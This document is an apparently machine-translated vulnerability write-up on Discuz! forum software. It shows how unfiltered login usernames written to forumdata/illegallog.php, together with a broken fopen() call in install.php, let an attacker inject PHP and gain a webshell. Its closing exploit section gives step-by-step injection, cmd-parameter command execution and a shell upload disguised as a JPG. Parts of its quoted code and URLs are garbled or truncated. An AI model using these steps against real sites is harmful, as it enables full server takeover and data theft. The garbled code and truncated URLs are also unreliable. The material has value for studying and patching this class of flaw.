discuz! Forum install.php Writing Error Vulnerability Research

Write errors that cause malicious user constructs statements to be written to Webshell and thus control the entire server.
A few nights ago, put the foreground file, as long as the variables in the database call were read over again. To see if there is not a strict filter, after reading that the filter is not strictly the place is indeed a lot of, but have been in the quotation mark protected. In PHP, if the Magic_qoute_gpc=on (default) compiler automatically escape the single quotes and other special characters, it is very difficult for us to change the execution process of the program at this time. This greatly increases the difficulty of the invasion, in a way, it does guarantee its security. This is also why friends make sure that they are still available when MAGIC_QOUTE_GPC is on. A vulnerability that requires single quotes to be exploited is essentially useless in the discuz! forum.
After reading all the database connections in all the files, I didn't find anything of value. At this point the idea began to get a little messy, I'm wondering if I should try to take a look at the programmer's logic flaws, which means I'm going to read through all the code and find out where programmers are not thinking about when they write a program, which is mostly a context-logical relationship error, or a limited one, There are some things that should have been noticed, but the administrators had to overlook the place.
Thinking about it, there seems to be nothing to be lazy about, just read through the code. Since the goal is a logical error, it is important to look closely at the context, so choose to start at the entry point. The entry point should be logging.php, as this is the place where everyone will log in and enter the forum. Let's Go!
The old rules, let's take a look at the code:
=========codz begin==========
$errorlog = "$username \ T". substr ($password, 0, 2);
......
$errorlog. = substr ($password,-1). " \t$onlineip\t$timestamp\n ";
$password = MD5 ($password);
$query = $db->query ("Select M.username as Discuz_user, M.password as DISCUZ_PW, M.status, M.styleid as Styleidmem, M . Lastvisit,
U.groupid, U.isadmin, u.specifiedusers like '%\t$username\t% ' as Specifieduser
From $table _members m-left JOIN $table _usergroups u on u.specifiedusers like '%\t$username\t% ' or U.status=m.status and ( (u.creditshigher= ' 0 ' and u.creditslower= ' 0 ' and u.specifiedusers= ') OR (M.credit>=u.creditshigher and M.creditwhere username= ' $username ' and password= ' $password ' ORDER by Specifieduser DESC ");
......
if (! $discuz _user)
{
@ $fp = fopen ($discuz _root. /forumdata/illegallog.php ', ' a ');
@flock ($FP, 3);
@fwrite ($fp, $errorlog);
@fclose ($FP);
ShowMessage (' Login_invalid ', ' index.php ');
}
=========codz endz==============
This code to see, he first record the user name and password entered, the password only take the first two digits, and then the password after a bit, and the IP and time together assigned. Then go to the MD5 value of the password and put it in the database. If you think we can change the operation process of the database execution statement that's wrong, we have nothing to do with single quotes (at least I can't do anything unless I encrypt it). If the username and password are not correct, the wrong username and password will be logged into illegallog.php. Throughout this process of recording the wrong password, the variable has not been validated, which means that if I mean to enter the wrong username, he will not check and then record it directly. So if my error username is an executable code, he will also record it. After he has recorded it, we can call this file to form a shell.
Are you excited about being here? Sorry, your excitement is invalid. I was not excited at all, because when I read the first time in front, I paid special attention to the operation of discuz! on the file handle, he did not filter the individual variables, But when he was initialized in the install.php, he had added a sentence to the beginning of all the data files used to end the. PHP:. This is written at the time of initialization, and we should all understand the role of this sentence. You can't call what you write, because it's over in the beginning. This is obviously not going to work. A little annoyed, thought is not 5 sheep stick? You lose, you lose! A pique drop code, oneself ran to Grandma's that house, hug the grandmother to sprinkle, (in front of Grandma spoiled, cheat, trouble is one of my favorite things) I repeatedly cursed in front of Grandma discuz! of the Metamorphosis, said I how to seriously read the code. Grandma didn't know what I was talking about, and I didn't care that I was messing with her and kept watching my own TV. After a while, grandma should say: "You this child, is careless, not at all forestall, you see this what code (estimate is said code) again bad". I rattle and laugh and crawl back into my own house. Sitting in front of the computer, drank a cup of boiled water, calmed down a bit.
Be careful, perseverance, self-study, good at summarizing is very necessary. Go back and read the logging.php file again to see if there is anything that you ignore. The file is not long, and see again that there is no problem. Since there is no problem here, the idea is put on that sentence, how is this sentence written?
So I turned this code in the install.php:
==========codz begin==========
function LogInit ($log) {
Echo ' initialization record '. $log;
$fp = @fopen ('./forumdata/illegallog.php ');
@fwrite ($fp, "\ n");
@fclose ($FP);
Result ();
35}
......
1389 loginit (' Karmalog ');
1390 LogInit (' Illegallog ');
1391 loginit (' Modslog ');
1392 loginit (' Cplog ');
1393 dir_clear ('./forumdata/templates ');
1394 Dir_clear ('./forumdata/cache ');
==========codz endz==========
Obviously, loginit this function is to write this sentence in the illegallog.php. This way, even if we write the code, it will not be able to invoke execution because of that sentence. We have completely entered a dead end. But I seem to think that this piece of code where some problems, and then carefully looked at, that fopen look at how so not pleasing to the eye ah. If I remember correctly, fopen's syntax format should be this:
Resource fopen (string filename, string mode [, int use_include_path [, Resource Zcontext]])
The first two parameters, one is a file handle, or specifies which file to open. The second parameter specifies how to open, such as read or write. Here to remind you that the two parameters are required. For example, we write the jambalaya.php of the directory, our statement is this: fopen ('./jambalya.php ', ' W '), the following open mode must be selected, otherwise it will be an error. But we noticed that there was only one parameter in his code, so how could the program execute correctly?
Let's do a test, create a 1.php, and write the following code:
===========codz begin==========
$fp = @fopen ('./2.php ');
@fwrite ($fp, "\ n");
@fclose ($FP);
echo "success!";
===========codz endz============
Here is the same environment as in discuz!, if the program succeeds, it generates a 2.php in the root directory, and the first line of 2.php should be, and the screen will display success, In fact, the success here is used to let us know where the program executes. We submit in the URL: http://127.0.0.1/myhome/1.php, the screen shows the success, which indicates that it has been executed to the end of the program. However, checking the directory found that no file named 2.php was generated, which means that we failed to write. Perhaps everyone will be surprised that write failure should have an error message AH. It should be, but because the @ was added before the fopen, and @ in PHP is used to suppress all the error messages generated by the calling function. In other words, even if there is a mistake, there is no error.
Grandma's lesson is correct, I was too careless!
Assuming that everything is in my way of thinking, it is said that in the initialization of the installation, because of the fopen error use, so discuz/ Forumdata directory will never produce a illegallog.php file containing code, but because the suppression of error messages, the installation will still show the initialization of success, in fact, but did not initialize, but did not produce illegallog.php. If there is no initialization here, it means that the generation and initialization of illegallog.php will be done in logging.php. logging.php initialization does not write any protection statements or filtering to the file to avoid user invocation. Here, everything is clear. To be blunt, that is, because of the initialization of install.php file errors, we can write malicious code through logging.php, and then call that file to generate a shell to control the entire site.


The exploit code is as follows
The following may be offensive, for security research and teaching purposes only. User Risk Ego

Do not register any account, to the landing page, in the login user name first enter 123456, carriage return. Here you may understand that the first two digits of the password are displayed so that the illegallog.php inside is:
6 127.0.0.1 1022383175

This allows you to view the PHP settings, and let's take a look at whether the Register_globals setting is on. (Most of the sites are on) good, and then we enter at the landing port, it is best not to use System (), I was doing tests when many sites have this system () function disabled.
And then we call Http://192.168.0.13/forumdata/illegallog.php?cmd=dir
In front of a heap of rubbish information, to the bottom of the list can see the directory is listed? But this is a bit cumbersome to write, because in the experiment, the large site registered users have more than 100,000 people, then this file will be surprisingly large, open speed is very slow.
So we can actually write this here, we change the PHP shell into JPG image, uploaded to the host.
Called in the URL:
http://192.168.0.13/forumdata/illegallog.p...chments/Jam.php
Then we submit the URL directly:
Http://192.168.0.13/attachments/Jam.php is?... A Shell now!